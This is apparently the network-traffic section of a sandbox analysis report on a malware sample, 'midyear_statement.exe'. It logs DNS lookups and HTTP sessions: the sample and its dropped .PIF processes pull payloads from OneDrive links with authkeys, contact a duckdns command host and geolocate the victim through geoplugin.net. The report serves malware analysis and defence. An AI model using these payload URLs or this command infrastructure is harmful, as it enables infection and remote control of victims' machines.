Mar 28, 2024 13:59:14.901407003 CET | 53 | 62960 | 1.1.1.1 | 192.168.2.7
Mar 28, 2024 13:59:16.059748888 CET | 49991 | 53 | 192.168.2.7 | 1.1.1.1
Mar 28, 2024 13:59:16.157485962 CET | 53 | 49991 | 1.1.1.1 | 192.168.2.7
Mar 28, 2024 13:59:28.080483913 CET | 54833 | 53 | 192.168.2.7 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 28, 2024 13:58:58.458333969 CET | 192.168.2.7 | 1.1.1.1 | 0xcdd8 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:58:59.342339039 CET | 192.168.2.7 | 1.1.1.1 | 0xea44 | Standard query (0) | abqscw.sn.files.1drv.com | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:59:01.548681021 CET | 192.168.2.7 | 1.1.1.1 | 0x5c95 | Standard query (0) | aborlw.sn.files.1drv.com | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:59:03.433383942 CET | 192.168.2.7 | 1.1.1.1 | 0x589a | Standard query (0) | abpoxw.sn.files.1drv.com | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:59:14.766247034 CET | 192.168.2.7 | 1.1.1.1 | 0xf88 | Standard query (0) | www.zuckdgreb.duckdns.org | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:59:16.059748888 CET | 192.168.2.7 | 1.1.1.1 | 0xf4d5 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:59:28.080483913 CET | 192.168.2.7 | 1.1.1.1 | 0xd12d | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 28, 2024 13:58:58.554639101 CET | 1.1.1.1 | 192.168.2.7 | 0xcdd8 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:58:58.554639101 CET | 1.1.1.1 | 192.168.2.7 | 0xcdd8 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:58:58.554639101 CET | 1.1.1.1 | 192.168.2.7 | 0xcdd8 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:58:58.554639101 CET | 1.1.1.1 | 192.168.2.7 | 0xcdd8 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:58:58.554639101 CET | 1.1.1.1 | 192.168.2.7 | 0xcdd8 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:58:59.486609936 CET | 1.1.1.1 | 192.168.2.7 | 0xea44 | No error (0) | abqscw.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:58:59.486609936 CET | 1.1.1.1 | 192.168.2.7 | 0xea44 | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:59:01.684077024 CET | 1.1.1.1 | 192.168.2.7 | 0x5c95 | No error (0) | aborlw.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:59:01.684077024 CET | 1.1.1.1 | 192.168.2.7 | 0x5c95 | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:59:03.562817097 CET | 1.1.1.1 | 192.168.2.7 | 0x589a | No error (0) | abpoxw.sn.files.1drv.com | sn-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:59:03.562817097 CET | 1.1.1.1 | 192.168.2.7 | 0x589a | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:59:14.901407003 CET | 1.1.1.1 | 192.168.2.7 | 0xf88 | No error (0) | www.zuckdgreb.duckdns.org | | 192.3.109.132 | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:59:16.157485962 CET | 1.1.1.1 | 192.168.2.7 | 0xf4d5 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:59:28.175837040 CET | 1.1.1.1 | 192.168.2.7 | 0xd12d | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:59:28.175837040 CET | 1.1.1.1 | 192.168.2.7 | 0xd12d | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:59:28.175837040 CET | 1.1.1.1 | 192.168.2.7 | 0xd12d | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Mar 28, 2024 13:59:28.175837040 CET | 1.1.1.1 | 192.168.2.7 | 0xd12d | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false
Mar 28, 2024 13:59:28.175837040 CET | 1.1.1.1 | 192.168.2.7 | 0xd12d | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                        • onedrive.live.com
                                                                                                                                                                                        • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49712 | 178.237.33.50 | 80 | 7896 | C:\Users\Public\Libraries\wkrriuhD.pif
Timestamp | Bytes transferred | Direction | Data
Mar 28, 2024 13:59:16.440784931 CET | 71 | OUT | GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Mar 28, 2024 13:59:16.624198914 CET | 1197 | IN | HTTP/1.1 200 OK
    date: Thu, 28 Mar 2024 12:59:16 GMT
    server: Apache
    content-length: 989
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"102.165.48.43", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Washington", "geoplugin_region":"District of Columbia", "geoplugin_regionCode":"DC", "geoplugin_regionName":"District of Columbia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"38.894", "geoplugin_longitude":"-77.0365", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 13.107.139.11 | 443 | 6428 | C:\Users\user\Desktop\midyear_statement.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-28 12:58:59 UTC | 213 | OUT | GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-03-28 12:58:59 UTC | 1177 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://abqscw.sn.files.1drv.com/y4m-zYwpFACL5iXnxCgcfUGrba1rEn19VhjL7w-TerMTn_xp_gGpLreK-PlTDk9AFPAMe5HsUP3qj-MGltyTCGj4aJi9EHD48Te8_jT09vDvox1G7prWDzTDfk9sLUsrB_YQnpiMbMl2L_RIMZ7RQGUqIfg2_aWYOD_Pf0xfL4oorqUMJfgr9B01DU89645jiAwNuQsuLfJp-KkNbE5nCYQhg/255_Dhuirrkwdxq?download&psid=1
Set-Cookie: E=P:URKe1SZP3Ig=:LoLtWqQ1Z3eNsf6TMSuHA8hrfNoAFzXtZhZwDi+vM+k=:F; domain=.live.com; path=/
Set-Cookie: xid=5f93dee4-b388-46b0-9f44-6492dcd13c0f&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:18:59 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:58:59 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 68d84894c4-7pvdx
X-ODWebServer: nameastus2946819-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: B647429216164F639415A983F6774A3F Ref B: BN3EDGE0814 Ref C: 2024-03-28T12:58:59Z
Date: Thu, 28 Mar 2024 12:58:58 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49703 | 13.107.139.11 | 443 | 6428 | C:\Users\user\Desktop\midyear_statement.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-28 12:59:01 UTC | 213 | OUT | GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-03-28 12:59:01 UTC | 1181 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://aborlw.sn.files.1drv.com/y4mdIO5pciNH8fpwGOAAIADTo3pXjwRKPU-X6-J-zpDME1cfDB5-C-zJvJ0Zyx9NPNNsdX6VOMyHwKbWaiIcap2Zgvt0uEfbx1VtmbUV1pB4yROzM_enZjht50aHzMBFtXCcWKHbMiwUGRfkRpdYxkAdC7XyjDLJbd83GrL0fQFPvBMuibzaxQkijEzE2XaLliOxjjg7vASLv3lpX-FD_3i6w/255_Dhuirrkwdxq%201?download&psid=1
Set-Cookie: E=P:c97c1iZP3Ig=:KLjk01uvYiAW3lg36GDtxOfDLv/EkgdaPaIfYhsFi6w=:F; domain=.live.com; path=/
Set-Cookie: xid=88a0d70f-7ea3-440e-b0b4-1db931472409&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:01 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:01 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 55f6fc7498-f4zdb
X-ODWebServer: nameastus2708987-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: F4E562D52FFB4BED8CFB4CD8B8D404EC Ref B: BN3EDGE0510 Ref C: 2024-03-28T12:59:01Z
Date: Thu, 28 Mar 2024 12:59:01 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49706 | 13.107.139.11 | 443 | 6428 | C:\Users\user\Desktop\midyear_statement.exe

Timestamp | Bytes transferred | Direction | Data
2024-03-28 12:59:03 UTC | 213 | OUT | GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-03-28 12:59:03 UTC | 1181 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://abpoxw.sn.files.1drv.com/y4ms4H1tLcGEiSUU0ZXyS-1UhN1A1nY0HWv2H1VcTggiyFj5GyqXlnGNUvRGU1yWLZHBWtBLkNk7XrRTzZ1dmyUa0J__sLMIgAkVBZSn4LDSXDO0LsN9LnFsWe4K460IH2mRjrZAFM_P4UsnPwfW5_4UCDL4q61Ho8nzTRpE98lSCzh5879l2RhLQJ5TGUl9U57UBHgXMfa4meMhik09jbblg/255_Dhuirrkwdxq%202?download&psid=1
Set-Cookie: E=P:wSUP2CZP3Ig=:vb8UYGBQ1ELQn1t2XVzdh1QzbSg1K0KAcz4YY414YGs=:F; domain=.live.com; path=/
Set-Cookie: xid=c255408b-155b-4eb2-ab9a-4c6bb40d53de&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:03 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:03 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 68d84894c4-wh8lp
X-ODWebServer: nameastus2946819-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 14A3944AA3794427A37A8D3A53B995BC Ref B: BN3EDGE0220 Ref C: 2024-03-28T12:59:03Z
Date: Thu, 28 Mar 2024 12:59:02 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49719 | 13.107.139.11 | 443 | 7544 | C:\Users\Public\Libraries\Dhuirrkw.PIF

Timestamp | Bytes transferred | Direction | Data
2024-03-28 12:59:28 UTC | 213 | OUT | GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: onedrive.live.com
2024-03-28 12:59:29 UTC | 1177 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://abqscw.sn.files.1drv.com/y4mu3pWdZcj6Ve9WuLc8z50Ki8byXob_qMUj9cAdyMI-JlRVlQqz67Is5cy4lCX-g6MyBI4YNcvIdwxkWglTN1N8CY4cxMJjknOhla1QafWxdqZ0hdkCEBtgXH54x0vLiXgOU1cS8YybPN2dzFDtnkBcobZ8Mr4mXJ2zQSpmuWvSvzOBuuqnuX-boMZkf9QkzPjh8t6Uaxsr_nGRHX0lZhPqg/255_Dhuirrkwdxq?download&psid=1
Set-Cookie: E=P:IvE75yZP3Ig=:ThfCUuC1YIDpZNfrsquojGN6S2Stvds78s23vJ/gOKE=:F; domain=.live.com; path=/
Set-Cookie: xid=1a408388-8313-4f6c-aaa0-4719760cf4d1&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:28 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:28 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 55f6fc7498-q87sk
X-ODWebServer: nameastus2708987-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: CBCD08A13CC84363BD9FF580C6CA167E Ref B: BN3EDGE0510 Ref C: 2024-03-28T12:59:28Z
Date: Thu, 28 Mar 2024 12:59:28 GMT
Connection: close
Content-Length: 0


Session ID: 4 | Source IP: 192.168.2.7 | Source Port: 49722 | Destination IP: 13.107.139.11 | Destination Port: 443 | PID: 7544 | Process: C:\Users\Public\Libraries\Dhuirrkw.PIF

Timestamp: 2024-03-28 12:59:30 UTC | Bytes transferred: 213 | Direction: OUT
Data:
GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
Timestamp: 2024-03-28 12:59:31 UTC | Bytes transferred: 1181 | Direction: IN
Data:
HTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://aborlw.sn.files.1drv.com/y4mLOg16uNX2Id3t-nfFLVYL7CZhAgTRemSr1q_NX-Mvx_fpOOS9Dz7js9NACEXeYp59yyMOCGdVrkXC8udJaIfz1H8nMhuWKfjagQZcuRGJ1Yb2wZYOWm-d88Hj_uRkwI3lAFpIlsA6h_9dXusozCqeRmVf4a3Hwg5IawezbeHlk8-sROiCd2d-2kiTRt_8XOO7uHQvVZ9HJhyRGGqt6cSAQ/255_Dhuirrkwdxq%201?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:XcGH6CZP3Ig=:J+IBFRK6UnhhGtrRUuqbJqct6Wvktu8EbgJa+BsUHj0=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=36ad82bc-3bb3-4086-b7f9-f2ae1c694351&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:30 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:30 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 55f6fc7498-2tq7v
                                                                                                                                                                                        X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 87308BB7CB564EE4A4CB452E3A67C19F Ref B: BN3EDGE0316 Ref C: 2024-03-28T12:59:30Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:30 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49725 | Destination IP: 13.107.139.11 | Destination Port: 443 | PID: 7544 | Process: C:\Users\Public\Libraries\Dhuirrkw.PIF

Timestamp: 2024-03-28 12:59:33 UTC | Bytes transferred: 213 | Direction: OUT
Data:
GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
Timestamp: 2024-03-28 12:59:33 UTC | Bytes transferred: 1181 | Direction: IN
Data:
HTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://abpoxw.sn.files.1drv.com/y4mhwTfeKQ4eY5KLg3nmxa_boO0q7i2wmVFOUDCXUh0ad78865G9-BX4CJ3kGlJVsre75q-4v7SmhYlN4A28B7KTl_rsn_2Lb3l-IDJqY5bFudSe6ievn2XKMWWC8nrTi87i_cWOZzaBVu8lopLINETsI8XBCOuTIh1fXiRIGwic84eljalzk2hNvMzSd-gT9ELswKW3qqa16VYDqaJQ74DXg/255_Dhuirrkwdxq%202?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:DdA16iZP3Ig=:MQeKXEAruxUQWUVP5NEtwVLsZ3m9F4XpUqzbGVTt22k=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=66290227-7913-4e0f-a824-70a6e650a56f&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:33 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:33 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 68d84894c4-m6nm6
                                                                                                                                                                                        X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: A1D672B7BFF645DBA7D256096AA60C25 Ref B: BN3EDGE0614 Ref C: 2024-03-28T12:59:33Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:33 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49728 | Destination IP: 13.107.139.11 | Destination Port: 443 | PID: 6044 | Process: C:\Users\Public\Libraries\Dhuirrkw.PIF

Timestamp: 2024-03-28 12:59:36 UTC | Bytes transferred: 213 | Direction: OUT
Data:
GET /download?resid=653A5056738F1A02%21262&authkey=!ANnz1a3_33sd8v4 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
Timestamp: 2024-03-28 12:59:37 UTC | Bytes transferred: 1177 | Direction: IN
Data:
HTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://abqscw.sn.files.1drv.com/y4mqqfuxAaojOBVtfPX5lO_9YqS1UQ6NBRcPNPOJVv4XmHDm5_Gtl5qEf2kPgFewLT240WuRsCJqcOu-h0nRwQFIp7UER0szhBtwvKsPipxIfChcBqJywL1ZRKUsPYmNaLuKmgdg7zlXv5cgYZq6sDmAZgaQYE5t3kZcTS2XQRJfulwJKDHOfFKOny-KSfQqjOVIZ9EE3CJmIjLK0zYnMEaAg/255_Dhuirrkwdxq?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:uns47CZP3Ig=:Z8BRn7ndpvBpO9tcKrL/iCIpv/rLTAc9ZRrG4u9Bd18=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=9a1936c4-a5fb-46e2-88d1-88e3d96fc290&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:37 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:37 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 55f6fc7498-fgnbx
                                                                                                                                                                                        X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 995624025D12431CB68FFC2F4520C76E Ref B: BN3EDGE0413 Ref C: 2024-03-28T12:59:37Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:37 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49731 | Destination IP: 13.107.139.11 | Destination Port: 443 | PID: 6044 | Process: C:\Users\Public\Libraries\Dhuirrkw.PIF

Timestamp: 2024-03-28 12:59:38 UTC | Bytes transferred: 213 | Direction: OUT
Data:
GET /download?resid=653A5056738F1A02%21263&authkey=!AN5i5LusLT79ejg HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
Timestamp: 2024-03-28 12:59:39 UTC | Bytes transferred: 1181 | Direction: IN
Data:
HTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Location: https://aborlw.sn.files.1drv.com/y4mXBt2sSJKJZHlLzI8sH3PFmgRqsPoY_FaTasOJSi4WNTk8bd6AgZ1TzwzQWZ2uDijWJTMVWvNk7B4Qv7G4iDBRq9erQEykxjiVo_KqdGj_ppHb_qVh4I4GTgl18qcnNpGyLCxpBouyROeAZkKOj5A8RqqgS2RKBVz3MwCVm-LlkuyAon09hV4z9mBijNgqmLPO3Qimh3B2Ja3lF4RGaoYcA/255_Dhuirrkwdxq%201?download&psid=1
                                                                                                                                                                                        Set-Cookie: E=P:JyVb7SZP3Ig=:WLjNeVwJXi5er2wsqTcDiuImJWEQim5M3M7HF5/xCz8=:F; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xid=ef4af2f9-08c5-4fdf-bcbe-7a9461666dbb&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                                                        Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:38 GMT; path=/
                                                                                                                                                                                        Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:39 GMT; path=/
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        X-MSNServer: 55f6fc7498-smmtm
                                                                                                                                                                                        X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                        X-MSEdge-Ref: Ref A: B391C3E90CB54B5FB528CB3D61123954 Ref B: BN3EDGE0911 Ref C: 2024-03-28T12:59:38Z
                                                                                                                                                                                        Date: Thu, 28 Mar 2024 12:59:38 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 0


Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49734 | Destination IP: 13.107.139.11 | Destination Port: 443 | PID: 6044 | Process: C:\Users\Public\Libraries\Dhuirrkw.PIF

Timestamp: 2024-03-28 12:59:40 UTC | Bytes transferred: 213 | Direction: OUT
Data:
GET /download?resid=653A5056738F1A02%21264&authkey=!AJnxVlB06nkVKsk HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                        Host: onedrive.live.com
Timestamp: 2024-03-28 12:59:41 UTC | Bytes transferred: 1181 | Direction: IN
Data:
HTTP/1.1 302 Found
                                                                                                                                                                                        Cache-Control: no-cache, no-store
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Expires: -1
Location: https://abpoxw.sn.files.1drv.com/y4maSSmIiFxHS53VrMh0Wc-KmE9UNGqFMoeO06mE8M1WEFsDmr1AeIzN4LcJU6cd0KwWqzDYPredBI5vJzq086sSkmP708M63WpYEpwq4Yb4UOciCaZK99NZv3Glv0RdkNg_bt9lvj4D3Yez3DFE6yjM5TlcLOyWpdO5eKA7S5G9HP8JxZkNdZIqLRpjs3yvx7DKG7OJWse6GZve05jg-ma6g/255_Dhuirrkwdxq%202?download&psid=1
Set-Cookie: E=P:tYB+7iZP3Ig=:jpn+rMAexaaFH8vGoJZPZiSkdfipQz36GNFl7j3Hp/E=:F; domain=.live.com; path=/
Set-Cookie: xid=8c9cc4ae-19e8-4d2d-a83f-44208391d04b&&ODSP-ODWEB-ODCF&124; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Thu, 28-Mar-2024 11:19:40 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Thu, 04-Apr-2024 12:59:41 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: 68d84894c4-t9fd4
X-ODWebServer: nameastus2946819-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 07DC7F13EE3F45A0A94A6FC624985DDE Ref B: BN3EDGE0607 Ref C: 2024-03-28T12:59:40Z
Date: Thu, 28 Mar 2024 12:59:40 GMT
Connection: close
Content-Length: 0

Target ID:0
Start time:13:58:56
Start date:28/03/2024
